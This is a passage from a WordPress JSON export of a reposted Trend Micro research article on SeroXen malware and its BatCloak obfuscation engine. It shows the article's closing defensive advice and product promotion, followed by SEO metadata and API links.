open-source projects that work together to generate a FUD payload. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/stealthy-seroxen-rat-malware-increasingly-used-to-target-gamers\/\">Reports<\/a> <a href=\"https:\/\/cybersecurity.att.com\/blogs\/labs-research\/seroxen-rat-for-sale\">have<\/a> <a href=\"https:\/\/www.hackread.com\/windows-users-beware-seroxen-rat-hit-gamers\/\">emerged<\/a> of SeroXen being used in several infections and attacks. 
We expect the evolved BatCloak engine at the core of SeroXen\u2019s FUD capabilities to keep evolving and to be reused as a FUD tool in future malware attacks.<\/p>\n<p>Individuals are strongly advised to adopt a skeptical stance when encountering links and software packages associated with terms such as &#8220;cheats,&#8221; &#8220;hacks,&#8221; &#8220;cracks,&#8221; and other software that promises a competitive edge. Users, developers, gamers, and enthusiasts are also advised to exercise caution when executing batch files obtained from the internet. Additionally, organizations are encouraged to stay vigilant against phishing attacks that might entice users to download and run batch installers (e.g., batch files presented as scripts that automate repetitive tasks).<\/p>\n<p>Organizations should consider employing a cutting-edge <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\">multilayered defensive strategy<\/a> and comprehensive security solutions, such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response\/xdr.html\">Trend Micro\u2122 XDR<\/a>, that can detect, scan, and block malicious content such as SeroXen and BatCloak across the modern threat landscape. An extended detection and response capability across endpoints, servers, workloads, email, network, cloud, and identity, observed from a single platform like <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/security-operations.html\">Trend Vision One\u2122\ufe0f<\/a>, can mitigate these risks by considering adversarial tactics, techniques, and procedures (TTPs) to profile the entirety of a routine. 
Learn more about how the <a href=\"https:\/\/www.zerodayinitiative.com\/about\/\">Zero Day Initiative (ZDI)<\/a> bug bounty program rewards researchers for responsible vulnerability disclosure and protects organizations globally, and stay up to date on the latest <a href=\"https:\/\/www.zerodayinitiative.com\/blog?tag=Security+Patch\">news regarding mission-critical security patches<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We looked into the documented behavior of SeroXen malware and noted the inclusion of the latest iteration of the batch obfuscation engine BatCloak to generate a fully undetectable (FUD) .bat loader. This is the second part of a three-part series documenting the abuse of BatCloak\u2019s evasion capabilities and interoperability with other malware. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":52353,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9511,9508,9514,9513,9577,9536,9585],"class_list":["post-52352","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-iot","tag-trend-micro-research-malware","tag-trend-micro-research-phishing","tag-trend-micro-research-privacyrisks","tag-trend-micro-research-spam"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-15T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"SeroXen Incorporates Latest BatCloak Engine 
Iteration\",\"datePublished\":\"2023-06-15T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\"},\"wordCount\":2092,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"keywords\":[\"Trend Micro Research : APT&amp;Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : IoT\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Phishing\",\"Trend Micro Research : Privacy&amp;Risks\",\"Trend Micro Research : Spam\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\",\"name\":\"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity 
News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"datePublished\":\"2023-06-15T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\",\"width\":1397,\"height\":1167},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/seroxen-incorporates-latest-batcloak-engine-iteration\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : 
APT&amp;Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"SeroXen Incorporates Latest BatCloak Engine Iteration\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 
Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","og_locale":"en_US","og_type":"article","og_title":"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-06-15T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. 
reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"SeroXen Incorporates Latest BatCloak Engine Iteration","datePublished":"2023-06-15T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/"},"wordCount":2092,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","keywords":["Trend Micro Research : APT&amp;Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : IoT","Trend Micro Research : Malware","Trend Micro Research : Phishing","Trend Micro Research : Privacy&amp;Risks","Trend Micro Research : Spam"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","url":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","name":"SeroXen Incorporates Latest BatCloak Engine Iteration 2026 | ThreatsHub Cybersecurity 
News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","datePublished":"2023-06-15T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/06\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg","width":1397,"height":1167},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&amp;Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"SeroXen Incorporates Latest BatCloak Engine 
Iteration"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8
671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52352","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=52352"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/52352\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/52353"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=52352"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=52352"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=52352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}